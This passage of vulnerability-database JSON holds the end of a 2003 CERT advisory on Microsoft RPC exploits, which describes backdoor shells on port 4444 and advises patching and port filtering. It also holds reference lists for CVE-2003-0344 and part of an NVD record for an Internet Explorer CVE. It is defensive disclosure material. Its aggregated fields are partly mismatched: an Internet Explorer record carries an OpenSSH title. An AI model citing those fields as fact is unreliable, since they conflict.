exclusivity or\n results obtained from use of the material. Carnegie Mellon University\n does not make any warranty of any kind with respect to freedom from\n patent, trademark, or copyright infringement. \n ______________________________________________________________________\n\n Conditions for use, disclaimers, and sponsorship information\n\n Copyright \\xa92003 Carnegie Mellon University. \n\n-----BEGIN PGP SIGNATURE-----\nVersion: PGP 6.5.8\n\niQCVAwUBP8JVOZZ2NNT/dVAVAQGL9wP+I18NJBUBuv7b0pam5La7E7qOQFMn5n78\n7i0gBX/dKgaY5siM6jBYYwCbbA7Y0/Jwtby2zHp1s8RHZY5/3JEzElfv4TLlR8rT\nrb8gJDbpan2JWA6xH9IzqZaSrxrXpNypwU2wWxR2osmbYl8FdV0rD3ZYXJjyi+nU\nUENALuNdthA=\n=DD60\n-----END PGP SIGNATURE-----\n. \n-----BEGIN PGP SIGNED MESSAGE-----\n\nCERT Advisory CA-2003-19 Exploitation of Vulnerabilities in Microsoft RPC\nInterface\n\n Original issue date: July 31, 2003\n Last revised: -\n Source: CERT/CC\n\n A complete revision history is at the end of this file. \n\nI. Known exploits target TCP port 135 and create a\n privileged backdoor command shell on successfully compromised hosts. \n Some versions of the exploit use TCP port 4444 for the backdoor, and\n other versions use a TCP port number specified by the intruder at\n run-time. We have also received reports of scanning activity for\n common backdoor ports such as 4444/TCP. In some cases, due to the RPC\n service terminating, a compromised system may reboot after the\n backdoor is accessed by an intruder. Based on\n current information, we believe this vulnerability is separate and\n independent from the RPC vulnerability addressed in MS03-026. The\n CERT/CC is tracking this additional vulnerability as VU#326746 and is\n continuing to work to understand the issue and mitigation strategies. \n\n In both of the attacks described above, a TCP session to port 135 is\n used to execute the attack. However, access to TCP ports 139 and 445\n may also provide attack vectors and should be considered when applying\n mitigation strategies. \n\nII. \n\nIII. Solutions\n\nApply patches\n\n All users are encouraged to apply the patches referred to in Microsoft\n Security Bulletin MS03-026 as soon as possible in order to mitigate\n the vulnerability described in VU#568148. These patches are also\n available via Microsoft\u0027s Windows Update service. \n\n Systems running Windows 2000 may still be vulnerable to at least a\n denial of service attack via VU#326746 if their DCOM RPC service is\n available via the network. Therefore, sites are encouraged to use the\n packet filtering tips below in addition to applying the patches\n supplied in MS03-026. \n\nFilter network traffic\n\n Sites are encouraged to block network access to the RPC service at\n network borders. This can minimize the potential of denial-of-service\n attacks originating from outside the perimeter. The specific services\n that should be blocked include\n * 135/TCP\n * 135/UDP\n * 139/TCP\n * 139/UDP\n * 445/TCP\n * 445/UDP\n\n If access cannot be blocked for all external hosts, the CERT/CC\n recommends limiting access to only those hosts that require it for\n normal operation. As a general rule, the CERT/CC recommends filtering\n all types of network traffic that are not required for normal\n operation. \n\n Because current exploits for VU#568148 create a backdoor, which is in\n some cases 4444/TCP, blocking inbound TCP sessions to ports on which\n no legitimate services are provided may limit intruder access to\n compromised hosts. \n\nRecovering from a system compromise\n\n If you believe a system under your administrative control has been\n compromised, please follow the steps outlined in\n\n Steps for Recovering from a UNIX or NT System Compromise\n\nReporting\n\n The CERT/CC is tracking activity related to exploitation of the first\n vulnerability (VU#568148) as CERT#27479 and the second vulnerability\n (VU#326746) as CERT#24523. Relevant artifacts or activity can be sent\n to cert@cert.org with the appropriate CERT# in the subject line. \n\nAppendix A. Vendor Information\n\n This appendix contains information provided by vendors. If a vendor is not listed below, we\n have not received their comments. \n\nMicrosoft\n\n Please see Microsoft Security Bulletin MS03-026. \n\nAppendix B",
"sources": [
{
"db": "NVD",
"id": "CVE-2003-0344"
},
{
"db": "CERT/CC",
"id": "VU#333628"
},
{
"db": "CERT/CC",
"id": "VU#813208"
},
{
"db": "CERT/CC",
"id": "VU#326746"
},
{
"db": "CERT/CC",
"id": "VU#561284"
},
{
"db": "CERT/CC",
"id": "VU#679556"
},
{
"db": "CERT/CC",
"id": "VU#334928"
},
{
"db": "JVNDB",
"id": "JVNDB-2003-000168"
},
{
"db": "BID",
"id": "7806"
},
{
"db": "PACKETSTORM",
"id": "31444"
},
{
"db": "PACKETSTORM",
"id": "32268"
},
{
"db": "PACKETSTORM",
"id": "31490"
}
],
"trust": 6.48
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#679556",
"trust": 3.2
},
{
"db": "NVD",
"id": "CVE-2003-0344",
"trust": 2.7
},
{
"db": "SECUNIA",
"id": "8943",
"trust": 2.4
},
{
"db": "BID",
"id": "7806",
"trust": 1.9
},
{
"db": "CERT/CC",
"id": "VU#813208",
"trust": 1.1
},
{
"db": "CERT/CC",
"id": "VU#334928",
"trust": 1.1
},
{
"db": "CERT/CC",
"id": "VU#326746",
"trust": 1.0
},
{
"db": "CERT/CC",
"id": "VU#561284",
"trust": 1.0
},
{
"db": "CERT/CC",
"id": "VU#333628",
"trust": 0.9
},
{
"db": "SECUNIA",
"id": "10156",
"trust": 0.8
},
{
"db": "XF",
"id": "12970",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2003-000168",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-200306-069",
"trust": 0.6
},
{
"db": "CERT/CC",
"id": "VU#265232",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "31444",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#784980",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#575892",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#254236",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#255484",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#865940",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#467036",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#380864",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#838572",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#422156",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#412478",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#935264",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#686224",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#483492",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#104280",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#567620",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#989932",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#967668",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#435444",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#732952",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "32268",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "31490",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#333628"
},
{
"db": "CERT/CC",
"id": "VU#813208"
},
{
"db": "CERT/CC",
"id": "VU#326746"
},
{
"db": "CERT/CC",
"id": "VU#561284"
},
{
"db": "CERT/CC",
"id": "VU#679556"
},
{
"db": "CERT/CC",
"id": "VU#334928"
},
{
"db": "BID",
"id": "7806"
},
{
"db": "JVNDB",
"id": "JVNDB-2003-000168"
},
{
"db": "PACKETSTORM",
"id": "31444"
},
{
"db": "PACKETSTORM",
"id": "32268"
},
{
"db": "PACKETSTORM",
"id": "31490"
},
{
"db": "CNNVD",
"id": "CNNVD-200306-069"
},
{
"db": "NVD",
"id": "CVE-2003-0344"
}
]
},
"id": "VAR-200306-0042",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 1.0
},
"last_update_date": "2022-05-08T07:26:52.746000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "MS03-032",
"trust": 0.8,
"url": "http://www.microsoft.com/technet/security/bulletin/ms03-032.asp"
},
{
"title": "MS03-020",
"trust": 0.8,
"url": "http://www.microsoft.com/technet/security/bulletin/ms03-020.asp"
},
{
"title": "MS03-032",
"trust": 0.8,
"url": "http://www.microsoft.com/japan/technet/security/bulletin/ms03-032.mspx"
},
{
"title": "MS03-020",
"trust": 0.8,
"url": "http://www.microsoft.com/japan/technet/security/bulletin/ms03-020.mspx"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2003-000168"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2003-0344"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.7,
"url": "http://www.eeye.com/html/research/advisories/ad20030604.html"
},
{
"trust": 2.4,
"url": "http://www.kb.cert.org/vuls/id/679556"
},
{
"trust": 1.6,
"url": "http://www.securityfocus.com/bid/7806"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/8943"
},
{
"trust": 1.6,
"url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2003/ms03-020"
},
{
"trust": 1.6,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a922"
},
{
"trust": 1.6,
"url": "http://marc.info/?l=bugtraq\u0026m=105476381609135\u0026w=2"
},
{
"trust": 1.6,
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2003-july/006401.html"
},
{
"trust": 0.9,
"url": "http://www.eeye.com/html/research/advisories/ad20030723.html"
},
{
"trust": 0.9,
"url": "http://support.microsoft.com/default.aspx?scid=kb;en-us;819696"
},
{
"trust": 0.8,
"url": "http://www.openssh.com/txt/buffer.adv"
},
{
"trust": 0.8,
"url": "http://www.mindrot.org/pipermail/openssh-unix-announce/2003-september/000062.html"
},
{
"trust": 0.8,
"url": "http://www.freebsd.org/cgi/cvsweb.cgi/ports/security/openssh/files/patch-buffer.c"
},
{
"trust": 0.8,
"url": "http://www.secunia.com/advisories/10156/"
},
{
"trust": 0.8,
"url": "about vulnerability notes"
},
{
"trust": 0.8,
"url": "contact us about this vulnerability"
},
{
"trust": 0.8,
"url": "provide a vendor statement"
},
{
"trust": 0.8,
"url": "http://www.microsoft.com/technet/security/bulletin/ms03-039.asp"
},
{
"trust": 0.8,
"url": "http://www.xfocus.org/advisories/200307/4.html"
},
{
"trust": 0.8,
"url": "http://www.microsoft.com/technet/security/bulletin/ms03-030.asp"
},
{
"trust": 0.8,
"url": "http://www.microsoft.com/windows/ie/downloads/critical/818529/default.asp"
},
{
"trust": 0.8,
"url": "http://www.microsoft.com/security/security_bulletins/ms03-020.asp"
},
{
"trust": 0.8,
"url": "http://www.secunia.com/advisories/8943/"
},
{
"trust": 0.8,
"url": "http://www.lac.co.jp/security/english/snsadv_e/68_e.html"
},
{
"trust": 0.8,
"url": "http://www.microsoft.com/technet/security/bulletin/ms03-032.asp"
},
{
"trust": 0.8,
"url": "http://msdn.microsoft.com/workshop/author/dhtml/reference/objects/object.asp"
},
{
"trust": 0.8,
"url": "http://xforce.iss.net/xforce/xfdb/12970"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2003-0344"
},
{
"trust": 0.8,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2003-0344"
},
{
"trust": 0.3,
"url": "http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms03-020.asp"
},
{
"trust": 0.3,
"url": "http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms03-032.asp"
},
{
"trust": 0.3,
"url": "http://www.kb.cert.org/vuls/id/334928"
},
{
"trust": 0.3,
"url": "http://www.kb.cert.org/vuls/id/813208"
},
{
"trust": 0.3,
"url": "/archive/1/324265"
},
{
"trust": 0.3,
"url": "/archive/1/323895"
},
{
"trust": 0.3,
"url": "http://www.cert.org/"
},
{
"trust": 0.3,
"url": "http://www.cert.org/cert_pgp.key"
},
{
"trust": 0.2,
"url": "http://www.kb.cert.org/vuls/id/561284"
},
{
"trust": 0.2,
"url": "http://www.kb.cert.org/vuls/id/326746"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/265232"
},
{
"trust": 0.1,
"url": "http://microsoft.com/technet/security/bulletin/ms03-030.asp"
},
{
"trust": 0.1,
"url": "http://www.cert.org/advisories/ca-2003-18.html"
},
{
"trust": 0.1,
"url": "http://www.cert.org/summaries/cs-2003-04.html"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/412478"
},
{
"trust": 0.1,
"url": "http://www.cert.org/advisories/"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/333628"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/567620"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/104280"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/686224"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/575892"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/732952"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/989932"
},
{
"trust": 0.1,
"url": "http://www.cert.org/current/archive/2003/09/19/archive.html#swena"
},
{
"trust": 0.1,
"url": "http://www.cert.org/summaries/"
},
{
"trust": 0.1,
"url": "http://www.cert.org/stats/cert_stats.html"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/784980"
},
{
"trust": 0.1,
"url": "http://www.cert.org/training/"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/838572"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/967668"
},
{
"trust": 0.1,
"url": "http://www.cert.org/current/current_activity.html"
},
{
"trust": 0.1,
"url": "http://www.cert.org/advisories/ca-2003-28.html"
},
{
"trust": 0.1,
"url": "http://www.cert.org/advisories/ca-2003-27.html"
},
{
"trust": 0.1,
"url": "https://www.cert.org/contact_cert/encryptmail.html"
},
{
"trust": 0.1,
"url": "http://www.cert.org/incident_notes/in-2003-04.html"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/435444"
},
{
"trust": 0.1,
"url": "http://www.cert.org/advisories/ca-2003-26.html"
},
{
"trust": 0.1,
"url": "http://www.cert.org/advisories/ca-2003-24.html"
},
{
"trust": 0.1,
"url": "http://www.cert.org/advisories/ca-2003-25.html"
},
{
"trust": 0.1,
"url": "http://www.cert.org/advisories/ca-2003-23.html"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/935264"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/467036"
},
{
"trust": 0.1,
"url": "https://www.cert.org/pgp/cert_pgp_key.asc"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/255484"
},
{
"trust": 0.1,
"url": "http://www.cert.org/current/archive/2003/11/19/archive.html#mimaili"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/865940"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/380864"
},
{
"trust": 0.1,
"url": "http://www.cert.org/congressional_testimony"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/422156"
},
{
"trust": 0.1,
"url": "http://www.cert.org/csirts/"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/254236"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/483492"
},
{
"trust": 0.1,
"url": "http://www.cert.org/advisories/ca-2003-19.html"
},
{
"trust": 0.1,
"url": "http://microsoft.com/technet/security/bulletin/ms03-026.asp"
},
{
"trust": 0.1,
"url": "http://support.microsoft.com?kbid=823980"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#333628"
},
{
"db": "CERT/CC",
"id": "VU#813208"
},
{
"db": "CERT/CC",
"id": "VU#326746"
},
{
"db": "CERT/CC",
"id": "VU#561284"
},
{
"db": "CERT/CC",
"id": "VU#679556"
},
{
"db": "CERT/CC",
"id": "VU#334928"
},
{
"db": "BID",
"id": "7806"
},
{
"db": "JVNDB",
"id": "JVNDB-2003-000168"
},
{
"db": "PACKETSTORM",
"id": "31444"
},
{
"db": "PACKETSTORM",
"id": "32268"
},
{
"db": "PACKETSTORM",
"id": "31490"
},
{
"db": "CNNVD",
"id": "CNNVD-200306-069"
},
{
"db": "NVD",
"id": "CVE-2003-0344"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#333628"
},
{
"db": "CERT/CC",
"id": "VU#813208"
},
{
"db": "CERT/CC",
"id": "VU#326746"
},
{
"db": "CERT/CC",
"id": "VU#561284"
},
{
"db": "CERT/CC",
"id": "VU#679556"
},
{
"db": "CERT/CC",
"id": "VU#334928"
},
{
"db": "BID",
"id": "7806"
},
{
"db": "JVNDB",
"id": "JVNDB-2003-000168"
},
{
"db": "PACKETSTORM",
"id": "31444"
},
{
"db": "PACKETSTORM",
"id": "32268"
},
{
"db": "PACKETSTORM",
"id": "31490"
},
{
"db": "CNNVD",
"id": "CNNVD-200306-069"
},
{
"db": "NVD",
"id": "CVE-2003-0344"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2003-09-16T00:00:00",
"db": "CERT/CC",
"id": "VU#333628"
},
{
"date": "2003-08-26T00:00:00",
"db": "CERT/CC",
"id": "VU#813208"
},
{
"date": "2003-07-31T00:00:00",
"db": "CERT/CC",
"id": "VU#326746"
},
{
"date": "2003-07-24T00:00:00",
"db": "CERT/CC",
"id": "VU#561284"
},
{
"date": "2003-06-04T00:00:00",
"db": "CERT/CC",
"id": "VU#679556"
},
{
"date": "2003-08-26T00:00:00",
"db": "CERT/CC",
"id": "VU#334928"
},
{
"date": "2003-06-04T00:00:00",
"db": "BID",
"id": "7806"
},
{
"date": "2007-04-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2003-000168"
},
{
"date": "2003-07-28T00:43:46",
"db": "PACKETSTORM",
"id": "31444"
},
{
"date": "2003-11-25T05:25:51",
"db": "PACKETSTORM",
"id": "32268"
},
{
"date": "2003-08-05T18:53:20",
"db": "PACKETSTORM",
"id": "31490"
},
{
"date": "2003-06-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200306-069"
},
{
"date": "2003-06-16T04:00:00",
"db": "NVD",
"id": "CVE-2003-0344"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2008-08-12T00:00:00",
"db": "CERT/CC",
"id": "VU#333628"
},
{
"date": "2003-09-03T00:00:00",
"db": "CERT/CC",
"id": "VU#813208"
},
{
"date": "2003-09-10T00:00:00",
"db": "CERT/CC",
"id": "VU#326746"
},
{
"date": "2003-07-30T00:00:00",
"db": "CERT/CC",
"id": "VU#561284"
},
{
"date": "2003-06-04T00:00:00",
"db": "CERT/CC",
"id": "VU#679556"
},
{
"date": "2005-08-11T00:00:00",
"db": "CERT/CC",
"id": "VU#334928"
},
{
"date": "2009-07-11T22:06:00",
"db": "BID",
"id": "7806"
},
{
"date": "2007-04-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2003-000168"
},
{
"date": "2021-07-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200306-069"
},
{
"date": "2021-07-23T12:55:00",
"db": "NVD",
"id": "CVE-2003-0344"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200306-069"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "OpenSSH contains buffer management errors",
"sources": [
{
"db": "CERT/CC",
"id": "VU#333628"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200306-069"
}
],
"trust": 0.6
}
}
FKIE_CVE-2012-1545
Vulnerability from fkie_nvd - Published: 2012-03-09 11:55 - Updated: 2025-04-11 00:51
Severity ?
Summary
Microsoft Internet Explorer 6 through 9, and 10 Consumer Preview, allows remote attackers to bypass Protected Mode or cause a denial of service (memory corruption) by leveraging access to a Low integrity process, as demonstrated by VUPEN during a Pwn2Own competition at CanSecWest 2012.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:microsoft:ie:10:consumer_preview:*:*:*:*:*:*",
"matchCriteriaId": "AD1E2761-48DA-444F-BC45-44F1401322F2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.0:*:*:*:*:*:*:*",
"matchCriteriaId": "A19F6133-25D1-44A5-B6B9-354703436783",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.2462.0000:*:*:*:*:*:*:*",
"matchCriteriaId": "314538E8-48EC-4869-9074-2A1F5B7CBB3C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.2479.0006:*:*:*:*:*:*:*",
"matchCriteriaId": "F56B3A72-7C5E-4F0C-BBC7-AA13DDFBEE70",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.0.2600:*:*:*:*:*:*:*",
"matchCriteriaId": "68656E52-AD8A-474E-9160-CD5F8857254B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.2600.0000:*:*:*:*:*:*:*",
"matchCriteriaId": "6876CE89-AA70-44C5-8A69-E2ED7A63F570",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.0.2800:*:*:*:*:*:*:*",
"matchCriteriaId": "93F47C82-E767-47A8-88DE-417B004ED7FC",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.0.2800.1106:*:*:*:*:*:*:*",
"matchCriteriaId": "F86E7189-CE21-4007-A3FA-39A6B51A5AB9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.2800.1106:*:*:*:*:*:*:*",
"matchCriteriaId": "BCE2555F-C4BE-482F-8DD9-976D2026058C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.0.2900:*:*:*:*:*:*:*",
"matchCriteriaId": "7B90EA4B-DA10-44B7-BD3D-6AE1197212D5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.0.2900.2180:*:*:*:*:*:*:*",
"matchCriteriaId": "7CBF9B51-5AF4-4317-9768-21D866AC7990",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.2900.2180:*:*:*:*:*:*:*",
"matchCriteriaId": "61F352FE-C22E-4B33-A46F-77A164B5DABB",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.3663.0000:*:*:*:*:*:*:*",
"matchCriteriaId": "5ACD5A44-0926-4A1B-9900-1E7CC0A561C8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.3718.0000:*:*:*:*:*:*:*",
"matchCriteriaId": "196CEE37-2E3A-41A7-9AC1-0D5CC3F35D8F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.3790.0000:*:*:*:*:*:*:*",
"matchCriteriaId": "3E16BEF4-71AA-4E23-B438-D25FFABDB646",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.3790.1830:*:*:*:*:*:*:*",
"matchCriteriaId": "1F32702E-F955-4DDB-B235-7C47E882453C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.3790.3959:*:*:*:*:*:*:*",
"matchCriteriaId": "6FA2B4AD-C04D-4A6B-8570-5A2F5489F750",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "6BC71FD8-D385-4507-BD14-B75FDD4C79E6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.0:beta:*:*:*:*:*:*",
"matchCriteriaId": "506711D9-6E57-4EED-8628-36C7F2324040",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.0:beta1:*:*:*:*:*:*",
"matchCriteriaId": "ED471260-0272-431F-A91E-AC2883D92497",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.0:beta2:*:*:*:*:*:*",
"matchCriteriaId": "63D18070-EC48-4904-9AE0-558F7F3B869D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.0:beta3:*:*:*:*:*:*",
"matchCriteriaId": "86584E3F-3B0D-4018-A186-E59F3B01CA5C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.0.5730:unknown:gold:*:*:*:*:*",
"matchCriteriaId": "817636ED-5E42-460E-89F1-24D5C64AB8BE",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.0.5730.11:*:*:*:*:*:*:*",
"matchCriteriaId": "0E6E1020-1017-4670-9316-27C79F1E2698",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.00.5730.1100:*:*:*:*:*:*:*",
"matchCriteriaId": "37F63AE1-8FC9-4C0F-8D19-F17DFA214E94",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.00.6000.16386:*:*:*:*:*:*:*",
"matchCriteriaId": "35B1186A-FA5B-4E49-8C2F-BCD2D45F22A2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.00.6000.16441:*:*:*:*:*:*:*",
"matchCriteriaId": "53D75496-8594-44DB-B5C4-EA3CABD6551A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:8.0.6001:*:*:*:*:*:*:*",
"matchCriteriaId": "5F709B61-F64B-4E8F-80BB-4944485B6125",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:8.0.6001:beta:*:*:*:*:*:*",
"matchCriteriaId": "612B8367-DAEF-4EE3-BC57-16A5CF4D3030",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:9:*:*:*:*:*:*:*",
"matchCriteriaId": "C043EDDD-41BF-4718-BDCF-158BBBDB6360",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Microsoft Internet Explorer 6 through 9, and 10 Consumer Preview, allows remote attackers to bypass Protected Mode or cause a denial of service (memory corruption) by leveraging access to a Low integrity process, as demonstrated by VUPEN during a Pwn2Own competition at CanSecWest 2012."
},
{
"lang": "es",
"value": "Microsoft Internet Explorer v6 a v9, y v10 Consumer Preview, permite a atacantes remotos eludir el modo protegido o causar una denegaci\u00f3n de servicio (por corrupci\u00f3n de memoria), aprovechando el acceso a un proceso de baja integridad, como lo demostr\u00f3 VUPEN durante una competencia Pwn2Own en CanSecWest 2012"
}
],
"id": "CVE-2012-1545",
"lastModified": "2025-04-11T00:51:21.963",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 4.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
]
},
"published": "2012-03-09T11:55:01.193",
"references": [
{
"source": "cve@mitre.org",
"url": "http://arstechnica.com/business/news/2012/03/ie-9-on-latest-windows-gets-stomped-at-hacker-contest.ars"
},
{
"source": "cve@mitre.org",
"url": "http://pwn2own.zerodayinitiative.com/status.html"
},
{
"source": "cve@mitre.org",
"url": "http://twitter.com/vupen/statuses/177895844828291073"
},
{
"source": "cve@mitre.org",
